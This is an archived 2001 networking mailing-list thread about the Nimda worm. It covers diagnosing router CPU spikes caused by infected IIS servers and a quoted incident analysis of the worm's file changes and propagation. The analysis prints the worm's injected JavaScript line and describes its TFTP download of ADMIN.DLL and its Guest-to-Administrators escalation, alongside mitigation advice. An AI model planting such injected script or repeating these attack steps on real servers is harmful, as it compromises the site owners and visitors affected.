This should serve as an object lesson in troubleshooting. It is an important skill to be able to separate the symptom from the cause. When Code Red first broke out a couple of months ago, there were posts on Groupstudy asking how to solve a problem of high CPU utilization on network routers. Some folks were looking for configuration changes, or IOS upgrades, or faulty hardware as causes. I believe a certain Big Bank out here in California went so far as to shut down a number of its routers because they were unable to determine the cause of the problem they were experiencing - which was a large number of internal web servers having been compromised by Code Red. I was in a training class yesterday, and my first experience with Nimda was when I walked through the door last night and my wife complained about how the internet wasn't working. My first thought was that some of the changes I had made to my firewall were to blame, but then as I thought it out, I realized that could not have been the case. for the simple reason that things were fine yesterday morning when I left home, and this was after a reboot of the firewall. In other words, the internet was working just fine after the changes I had made, and there was no possibility of artifact. Fortunately, my ISP e-mail server was reachable, and I was able to see from the traffic on NANOG that there was indeed a widespread internet based problem. A call to my ISP ( who for some reason still believes that the best way to report a problem is to visit their web site ) resulted in a vague message about "network problems" which was easy to interpret knowing what was being reported on NANOG. This is rambling now. The point being that high CPU utilization is a symptom. Understanding router operation, and protocol behaviour, goes a long way towards accurate troubleshooting. Chuck -----Original Message----- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]On Behalf Of Rik Guyler Sent: Wednesday, September 19, 2001 6:52 AM To: [EMAIL PROTECTED] Subject: RE: Alert: Some sort of IIS worm seems to be propagating [7:20388] I was doing battle with this beastie last night until midnight. This one's very bad as it overwrites files with various ".eml" files, typically seen is "readme.eml". If you do a search on the local drives for the extension, you will find numerous files (over 1600 in my case last night) found. How does this relate to Cisco? Well, I was originally called for a router problem as the Internet browsing and email transfer was very slow and of course the client's first thought was that there was a telco, router, DSU, etc. issue. I checked the router and the console (and VTY) was VERY slow. I ran a "show processor cpu" and discovered the processor utilization was nearly 100% and was staying there, which explains why the console was so slow. Upon deeper scrutiny, I found that "IP input" was the process using most of the processor, which indicates that IP traffic is jamming the router. With this knowledge, I went after the worm, which unfortunately, has no simple fix, at least at this time. When I removed the server from the network, the router was fine. So, all of the engineers that are so Cisco focused that a mere virus doesn't matter take heed - not everything can be judged on first impressions. --- Rik Guyler -----Original Message----- From: Brad Ellis [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 19, 2001 2:30 AM To: [EMAIL PROTECTED] Subject: Re: Alert: Some sort of IIS worm seems to be propagating [7:20366] John Kaberna, ([EMAIL PROTECTED]), sent me the following info: " This may be what you are experiencing: http://www.cert.org/current/current_activity.html#port80 Make sure you patch IIS if you haven't done so already. Check to see if you're already infected with Code Red and follow the instructions to get rid of it. http://www.microsoft.com/technet/treeview/default.asp?url=/technet/sec urity/bulletin/MS01-044.asp You can also use NBAR to block Red Worm if you haven't done so already. http://www.cisco.com/warp/customer/63/nbar_acl_codered.shtml " -Brad Ellis CCIE#5796 Network Learning Inc [EMAIL PROTECTED] used Cisco: www.optsys.net ""Farhan Ahmed"" wrote in message [EMAIL PROTECTED]">news:[EMAIL PROTECTED]... > -----Original Message----- > From: Simon Clausen [mailto:[EMAIL PROTECTED]] > Sent: Wednesday, September 19, 2001 12:49 AM > To: [EMAIL PROTECTED] > Subject: Re: Alert: Some sort of IIS worm seems to be propagating > > > Sent on behalf of Rich Zuris ([EMAIL PROTECTED]) due to his network > being taken offline by the worm. > > Following is a list of recorded changes made to NT4 SP6a with Q299444 > rollup security patches. > > The following is appended to EVERY HTML file on the machine: > window.open("readme.eml", null, > "resizable=no,top=6000,left=6000") > > Just about every directory on the machine has one or more files with > extension .eml, mostly readme.eml but also other names that seem to > correspond to directory or other filenames. Total of 1234 .eml files > created, totalling 98Mb (about 78Kb each). Also got 55 files with > extension .nws, containing exact same content. Both .eml and .nws files > can be opened by Outlook Express. > > Virus makes numerous outbound connections to port 80 to propagate itself > to other servers. > > Virus sets IE5 to IE4 compatibility mode (apparently to circumvent > security) and crashes Explorer.exe when IE is launched. IExplore.exe > appears to be hacked, and there is now a hidden IExplore .exe (note the > space before the extension) in same directory. > > Virus code in stealth executable file with name tftp###, where ### is > any numeric string. File has no extension, but it is definitely a > Windows executable. This file is placed into \Program Files\Common > Files\System\MSADC, and in same directory, Admin.dll appears to be > hacked. > > IIS console hacked: New MMC.EXE placed in \WINNT directory, which may > override original version in \WINNT\System32. > > EXE files placed into TEMP directory. Note that most/all hacked EXE > files are flagged Hidden. > > Riched20.dll files placed in random directories (not on PATH, not > containing executables). > > NT Account "Guest" was made a member of the NT "Administrators" group! > > Regards, > > Simon Clausen > > -----Original Message----- > From: Windows NTBugtraq Mailing List > [mailto:[EMAIL PROTECTED]] On Behalf Of Russ > Sent: Wednesday, 19 September 2001 1:21 AM > To: [EMAIL PROTECTED] > Subject: Alert: Some sort of IIS worm seems to be propagating > > > -----BEGIN PGP SIGNED MESSAGE----- > > There have been numerous reports of IIS attacks being generated by > machines over a broad range of IP addresses. These "infected" machines > are using a wide variety of attacks which attempt to exploit already > known and patched vulnerabilities against IIS. > > It appears that the attacks can come both from email and from the > network. > > A new worm, being called w32.nimda.amm, is being sent around. The > attachment is called README.EXE and comes as a MIME-type of > "audio/x-wav" together with some html parts. There appears to be no text > in this message when it is displayed by Outlook when in Auto-Preview > mode (always a good indication there's something not quite right with an > email.) > > The network attacks against IIS boxes are a wide variety of attacks. > Amongst them appear to be several attacks that assume the machine is > compromised by Code Red II (looking for ROOT.EXE in the /scripts and > /msadc directory, as well as an attempt to use the /c and /d virtual > roots to get to CMD.EXE). Further, it attempts to exploit numerous other > known IIS vulnerabilities. > > One thing to note is the attempt to execute TFTP.EXE to download a file > called ADMIN.DLL from (presumably) some previously compromised box. > > Anyone who discovers a compromised machine (a machine with ADMIN.DLL in > the /scripts directory), please forward me a copy of that .dll ASAP. > > Also, look for TFTP traffic (UDP69). As a safeguard, consider doing the > following; > > edit %systemroot/system32/drivers/etc/services. > > change the line; > > tftp 69/udp > > to; > > tftp 0/udp > > thereby disabling the TFTP client. W2K has TFTP.EXE protected by Windows > File Protection so can't be removed. > > More information as it arises. > > Cheers, > Russ - Surgeon General of TruSecure Corporation/NTBugtraq Editor > > -----BEGIN PGP SIGNATURE----- > Version: PGP Personal Privacy 6.5.2 > > iQCVAwUBO6dmcRBh2Kw/l7p5AQHJCgQA1JHwqF5RjJX+QVMMDUChVqn6yReQXqEH > Tm8Ujms5+6ia0tcT1qmZWJV48eHYNzV3+AyyO6Gn8ds/NVYJUupDHB1Yy1DY/po6 > iycY2qnARDJP6KNmHI0bAdBUBtsnVo5P9itElIoqKbAorQjamKI2eqd4TdE0yfIO > hSW7yN2lhJc= > =YAwc > -----END PGP SIGNATURE----- > > ======================================================================== > ==== > Delivery co-sponsored by Trend Micro, Inc. > ======================================================================== > ==== > TREND MICRO SCANMAIL FOR EXCHANGE 2000 -- SECOND to NONE > > If you are worried about email viruses, you need Trend Micro ScanMail > for Exchange. ScanMail is the first antivirus solution that seamlessly > integrates with the Microsoft Exchange 2000 virus-scanning API 2.0. > ScanMail ensures 100% inbound and outbound email virus scanning and > provides remote software management. Download a FREE 30-day trial copy > of ScanMail and find out why it is the best: > http://www.antivirus.com/banners/tracking.asp?si=8&BI;=240&UL;=/smex2000 > ======================================================================== > ==== > > ============================================================================ > Delivery co-sponsored by Trend Micro, Inc. > ============================================================================ > TREND MICRO SCANMAIL FOR EXCHANGE 2000 -- SECOND to NONE > > If you are worried about email viruses, you need Trend Micro ScanMail for > Exchange. ScanMail is the first antivirus solution that seamlessly > integrates with the Microsoft Exchange 2000 virus-scanning API 2.0. ScanMail > ensures 100% inbound and outbound email virus scanning and provides remote > software management. Download a FREE 30-day trial copy of ScanMail and find > out why it is the best: > http://www.antivirus.com/banners/tracking.asp?si=8&BI;=240&UL;=/smex2000 > ============================================================================ Message Posted at: http://www.groupstudy.com/form/read.php?f=7&i=20433&t=20433 -------------------------------------------------- FAQ, list archives, and subscription info: http://www.groupstudy.com/list/cisco.html Report misconduct and Nondisclosure violations to [EMAIL PROTECTED]
